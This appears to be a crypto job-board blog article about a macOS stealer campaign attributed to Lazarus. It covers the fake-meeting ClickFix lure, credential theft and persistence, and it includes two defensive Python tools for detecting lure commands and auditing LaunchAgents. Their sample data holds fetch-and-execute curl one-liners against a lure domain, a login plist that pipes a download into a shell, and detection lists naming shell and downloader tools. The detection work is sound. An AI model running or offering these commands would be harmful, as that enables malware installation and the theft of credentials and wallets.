North Korea Just Sent Your CEO a Fake Zoom Invite — Then Drained Their Crypto Wallet

You accept the Zoom invite. The meeting doesn’t load. A pop-up tells you to run a quick terminal command to fix the connection. You do it. Your keychain, your wallet, your credentials — gone. North Korea already has them. The malware deleted itself before you refreshed the page.

That’s “Mach-O Man.” And it’s targeting your CEO right now.

What Is Mach-O Man?

Discovered by security researchers at Bitso’s Quetzal Team and the ANY.RUN sandbox platform on April 21-22, 2026, Mach-O Man (Mach-O is the executable format macOS uses) is a modular macOS malware kit attributed to North Korea’s Lazarus Group, the same crew that stole $285 million from Drift Protocol on April 1 and $292 million from KelpDAO on April 18.

This isn’t a software exploit. There’s no zero-day, no patch to apply. It’s pure social engineering — and it’s devastatingly effective.

The Attack: Four Steps to Total Compromise

Step 1 — The Invite: A victim receives an “urgent” meeting invite on Telegram from what appears to be a colleague, partner, or recruiter. The link goes to a fake-but-convincing Zoom, Microsoft Teams, or Google Meet lookalike (think domains like update-teams.live).

Step 2 — The Fix: The fake meeting site displays a connection error and instructs the user to copy-paste a single curl command into Terminal to “fix the issue.” This is the ClickFix pattern. Gatekeeper never gets a look at the payload: it only evaluates files that a browser or another quarantine-aware app saved to disk with the quarantine attribute, and a file that curl fetches and the user’s own shell executes carries no such attribute. Nothing is bypassed by a clever trick; the user simply runs the code themselves.

Step 3 — The Harvest: The command downloads teamsSDK.bin, which deploys a four-stage infection chain. Its key behaviours:

  • Pops a fake system dialog asking for the macOS password. It deliberately rejects the first two entries and accepts the third, so the rejections look like typos, the prompt seems legitimate, and the attacker gets two more chances to capture the correctly typed password
  • Enumerates all running processes and the browser extensions installed in Chrome, Firefox, Safari, Brave, Opera, and Vivaldi (wallet extensions are the obvious target)
  • Steals browser cookies, the browsers’ SQLite login databases, and macOS Keychain entries, including crypto wallet seeds. The password captured in the first stage is what unlocks the login keychain

Step 4 — Vanish: All stolen data is compressed and exfiltrated via the Telegram Bot API, which looks like ordinary HTTPS to api.telegram.org. The stealer then deletes itself, so the disk holds little for a responder to find unless the persistence stage described below was also dropped. Victims typically don’t know they’ve been hit until funds disappear.
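The command line the victim pastes in Step 2 is the one artefact every defender can inspect, and the checklist further down asks for exactly this kind of curl monitoring. The following is an added example, not code from the article or from the researchers it cites. It scores a captured command line (from an EDR process-exec event or a shell history file; collection is out of scope) for the traits of the lure: a download into a temp or dot-directory, a chmod and execution of that file, a download piped straight into a shell, a download inside `$( )`, or a quarantine-attribute strip. The sample command lines are constructed; only update-teams.live and teamsSDK.bin come from the article, the other URL paths are made up.

```python
"""Triage of ClickFix-style "paste this into Terminal" one-liners.

Added example, not the article's or the researchers' code.  Scores a captured
command line (EDR process event, shell history) for the traits of the lure
described above.  Samples are constructed; only update-teams.live and
teamsSDK.bin come from the article.
"""
import os
import re
import shlex

STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/folders/", "/dev/shm/")
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh", "ksh", "dash"}
SEPARATORS = {"|", "||", "&&", ";", "&"}
WRAPPERS = ("sudo", "nohup", "exec", "command")
# Any one of these is enough to block the command and page someone.
STRONG = {"download_piped_to_shell", "download_in_command_substitution",
          "downloaded_file_executed", "quarantine_strip"}
SUBST_RE = re.compile(r"(\$\(|`)\s*(curl|wget)\b")   # bash -c "$(curl ...)"

def split_pipeline(cmd):
    """Split a one-liner into (operator_before, [tokens]) simple commands."""
    try:
        lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
        lex.whitespace_split = True
        tokens = list(lex)
    except ValueError:                 # unbalanced quotes: fall back to a crude split
        tokens = cmd.split()
    segments, current, op = [], [], None
    for tok in tokens:
        if tok in SEPARATORS:
            if current:
                segments.append((op, current))
            current, op = [], tok
        else:
            current.append(tok)
    if current:
        segments.append((op, current))
    return segments

def _command(seg):                     # (basename, raw word, args), skipping sudo/nohup
    i = 0
    while i < len(seg) - 1 and seg[i] in WRAPPERS:
        i += 1
    return os.path.basename(seg[i]), seg[i], seg[i + 1:]

def _is_staging_path(path):            # temp dirs or any dot-directory component
    if path.startswith(STAGING_PREFIXES):
        return True
    return any(p.startswith(".") and p not in (".", "..") for p in path.split("/"))

def analyze_command(cmd, _depth=0):
    """Return the sorted list of suspicious signals found in one command line."""
    signals = set()
    if SUBST_RE.search(cmd):
        signals.add("download_in_command_substitution")
    segments = split_pipeline(cmd)
    staged = set()                     # files a downloader wrote earlier in this line
    for idx, (op, seg) in enumerate(segments):
        name, raw, args = _command(seg)
        prev = _command(segments[idx - 1][1])[0] if idx else None
        if name in DOWNLOADERS:
            # curl -o FILE / wget -O FILE (curl's -O means "remote name", so wget only)
            out_flags = {"-o", "--output"} | ({"-O", "--output-document"} if name == "wget" else set())
            for i, a in enumerate(args):
                if a in out_flags and i + 1 < len(args):
                    staged.add(args[i + 1])
                    if _is_staging_path(args[i + 1]):
                        signals.add("download_to_staging_dir")
        elif name in SHELLS:
            if op == "|" and prev in DOWNLOADERS:
                signals.add("download_piped_to_shell")
            if "-c" in args and args.index("-c") + 1 < len(args) and _depth < 3:
                signals.update(analyze_command(args[args.index("-c") + 1], _depth + 1))
        elif name == "chmod" and any(a in staged or _is_staging_path(a) for a in args):
            signals.add("chmod_on_staged_file")
        elif name == "xattr" and any(a.startswith("-c") or "quarantine" in a for a in args):
            signals.add("quarantine_strip")
        elif raw in staged or ("/" in raw and _is_staging_path(raw)):
            signals.add("downloaded_file_executed")
    return sorted(signals)

def is_clickfix(cmd):                  # a strong signal, or two weaker ones combined
    found = set(analyze_command(cmd))
    return bool(found & STRONG) or len(found) >= 2

# Constructed samples: the first three mimic the lure, the last two are benign.
SAMPLE_COMMANDS = [
    "curl -fsSL https://update-teams.live/teamsSDK.bin -o /tmp/teamsSDK.bin && chmod +x /tmp/teamsSDK.bin && /tmp/teamsSDK.bin",
    'bash -c "$(curl -fsSL https://update-teams.live/fix)"',
    "curl -sL https://update-teams.live/fix.sh | sh",
    "curl -fsSL https://example.com/api/health -o /dev/null -w '%{http_code}'",
    "brew install jq",
]

def triage(commands=SAMPLE_COMMANDS):  # {command: (flagged, signals)} for the reviewer
    return {c: (is_clickfix(c), analyze_command(c)) for c in commands}

if __name__ == "__main__":
    for cmd, (flagged, found) in triage().items():
        print("FLAG" if flagged else "ok  ", found, "<-", cmd)
```

The heuristics deliberately ignore what the URL looks like: the lure domain changes per campaign, but the shape of the command (fetch, stage, execute) does not. Pair this with the hard policy below of never pasting commands from a meeting link, because a user who knows the rule will also report the prompt.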

Why This Is Different From Previous Lazarus Attacks

Previous Lazarus campaigns targeted crypto protocols directly — compromising code, exploiting smart contracts, or bribing insiders. Mach-O Man flips the script: it targets the humans who control the keys.

Security researcher Mauro Eldritch, founder of threat intelligence firm BCA Ltd, who flagged the campaign, described it as a significant evolution in Lazarus tradecraft. The kit is modular, and according to the researchers it is already being used by actors beyond Lazarus, which suggests it has been commercialized.

Crypto wallet Zerion confirmed losing approximately $100,000 in a related mid-April incident using AI-enabled social engineering — likely an early Mach-O Man deployment. At the protocol level, Lazarus has now stolen over $577 million in April 2026 alone across Drift, KelpDAO, and individual targets.

Mach-O Man Persistence (In Case You Don’t Catch It)

If the malware isn’t intercepted during exfiltration, it establishes persistence with a binary named to pass as Microsoft OneDrive, dropped into hidden (dot-prefixed) directories, plus a LaunchAgent plist that relaunches it at every login. It is designed to survive reboots and to blend in with ordinary enterprise software names when someone skims a process list.

How to Protect Your Team Right Now

Security teams should act immediately:

  • Audit LaunchAgents — check ~/Library/LaunchAgents/, /Library/LaunchAgents/ and /Library/LaunchDaemons/ for entries whose program lives in a hidden or temp directory or whose label does not match the file name
  • Block outbound Telegram Bot API traffic at the network level (api.telegram.org), or alert on it where Telegram is business-approved; this stops the exfiltration, not the collection
  • Monitor for curl executions from Terminal — flag any that download binaries to temp or hidden directories, pipe output into a shell, or strip the quarantine attribute
  • Never paste terminal commands from meeting links — establish this as a hard policy, and make reporting the prompt part of it
  • Verify meeting invites out-of-band — call or text the person who sent the invite on a number you already have before joining
  • Rotate credentials for anyone who may have been targeted, including every password stored in Keychain and every browser session; a wallet seed cannot be rotated, so move funds from any wallet whose seed was on the machine to a freshly generated one
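To turn the LaunchAgent audit above into something repeatable against the persistence mechanism described earlier, here is an added example that is not the article’s or the researchers’ code. It parses every plist from the standard agent and daemon directories (or, for the offline demo, from constructed samples) and flags a program in a dot- or temp directory, a vendor-sounding binary name (OneDrive, Teams, Zoom and similar) that does not live inside an .app bundle under /Applications, a Label that does not match the file name, and a shell or script interpreter handed inline code. The vendor watch-list, the sample plists and their paths are assumptions made for the demo.

```python
"""Audit LaunchAgent/LaunchDaemon plists for the persistence pattern described above.

Added example, not the article's or the researchers' code.  Vendor list, sample
plists and paths are assumptions; run load_agent_dirs() on a real Mac instead.
"""
import os
import plistlib

AGENT_DIRS = ("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons")
STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/folders/")
VENDOR_NAMES = ("onedrive", "teams", "zoom", "slack", "chrome", "dropbox")  # assumed watch-list
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript", "perl", "ruby"}

def program_of(plist):
    """Return (program_path, argv) from either Program or ProgramArguments."""
    argv = list(plist.get("ProgramArguments") or [])
    program = plist.get("Program") or (argv[0] if argv else "")
    return os.path.expanduser(program), argv

def _in_app_bundle(path):
    apps = ("/Applications/", os.path.expanduser("~/Applications/"))
    return ".app/Contents/" in path and path.startswith(apps)

def _hidden_or_temp(path):
    if path.startswith(STAGING_PREFIXES):
        return True
    return any(p.startswith(".") and p not in (".", "..") for p in path.split("/"))

def audit_plist(filename, data):
    """Return the list of findings for one plist (empty list means nothing odd)."""
    try:
        plist = plistlib.loads(data)          # handles XML and binary plists
    except Exception as exc:                  # InvalidFileException, ValueError or an expat error
        return [f"unparseable plist ({type(exc).__name__})"]
    if not isinstance(plist, dict):
        return ["top-level object is not a dictionary"]
    program, argv = program_of(plist)
    if not program:
        return ["no Program or ProgramArguments"]
    findings = []
    base = os.path.basename(program)
    if _hidden_or_temp(program):
        findings.append(f"program in hidden or temp directory: {program}")
    if any(v in base.lower() for v in VENDOR_NAMES) and not _in_app_bundle(program):
        findings.append(f"vendor-named binary outside an app bundle: {program}")
    label = plist.get("Label", "")
    if label and label != os.path.splitext(os.path.basename(filename))[0]:
        findings.append(f"Label {label!r} does not match file name {filename!r}")
    if base in INTERPRETERS and any(a in ("-c", "-e") for a in argv[1:]):
        findings.append(f"interpreter with inline code: {' '.join(argv)}")
    if findings and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive: relaunched at login and respawned if killed")
    return findings

def audit_files(files):
    """{filename: plist bytes} -> {filename: findings}, only for files with findings."""
    return {n: f for n, f in ((n, audit_plist(n, d)) for n, d in files.items()) if f}

def load_agent_dirs(dirs=AGENT_DIRS):
    """Read every .plist from the live directories (run this on the Mac being checked)."""
    files = {}
    for d in map(os.path.expanduser, dirs):
        if os.path.isdir(d):
            for name in os.listdir(d):
                if name.endswith(".plist"):
                    with open(os.path.join(d, name), "rb") as fh:
                        files[name] = fh.read()
    return files

# Constructed samples: a legitimate-looking updater agent, the kind of entry the
# persistence stage would leave behind, a loader script, and two edge cases.
SAMPLE_FILES = {
    "com.microsoft.OneDriveStandaloneUpdater.plist": plistlib.dumps({
        "Label": "com.microsoft.OneDriveStandaloneUpdater",
        "ProgramArguments": ["/Applications/OneDrive.app/Contents/MacOS/OneDriveStandaloneUpdater"],
        "RunAtLoad": True}),
    "com.microsoft.OneDrive.plist": plistlib.dumps({
        "Label": "com.microsoft.OneDrive.helper",
        "ProgramArguments": ["/Users/ceo/Library/.cache/.teams/OneDrive", "--daemon"],
        "RunAtLoad": True, "KeepAlive": True}),
    "com.example.loader.plist": plistlib.dumps({
        "Label": "com.example.loader",
        "ProgramArguments": ["/bin/bash", "-c", "curl -fsSL https://update-teams.live/x | sh"],
        "RunAtLoad": True}),
    "com.example.empty.plist": plistlib.dumps({"Label": "com.example.empty"}),
    "broken.plist": b"<plist><dict>",
}

if __name__ == "__main__":
    for name, found in audit_files(SAMPLE_FILES).items():   # swap in load_agent_dirs() on a real Mac
        print(name, *("\n  - " + f for f in found))
```

An on-disk audit only sees what was dropped in the standard directories, so on the machine itself also compare against what launchd actually has loaded with `launchctl print gui/$(id -u)`, and run `codesign -dv --verbose=4` on any flagged binary: a real OneDrive component carries Microsoft’s Developer ID signature, a renamed stealer does not.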

Why This Matters for Crypto Jobs

The Mach-O Man campaign is creating immediate demand across the industry:

Security Engineers specializing in macOS threat detection and endpoint protection are now critical hires at every crypto firm with more than a handful of employees. The ability to detect Lazarus-style ClickFix campaigns, audit LaunchAgents, and monitor for unusual curl activity is now a baseline requirement.

Threat Intelligence Analysts who track North Korean APT groups are in serious demand — firms that couldn’t justify the spend six months ago are now scrambling. Understanding Lazarus Group TTPs (tactics, techniques, and procedures) is a career-defining skill in 2026.

Security-Aware Developers and Protocol Engineers are commanding premium salaries. The Drift and KelpDAO breaches demonstrated that technical roles carry existential security responsibilities — firms are now vetting for security mindset at every engineering level.

Executive Security / CISO roles at crypto-native companies are being created at a pace not seen since the 2022 bear market cleanup. Boards want someone accountable before the next fake Zoom invite lands.

If you’re breaking into Web3 security or looking to level up, right now is the moment. The threat is real, the budget is unlocked, and the roles are open.


Looking for your next role in crypto security or Web3 engineering? Browse open positions at cryptogrind.com — the job board built for builders, not suits.
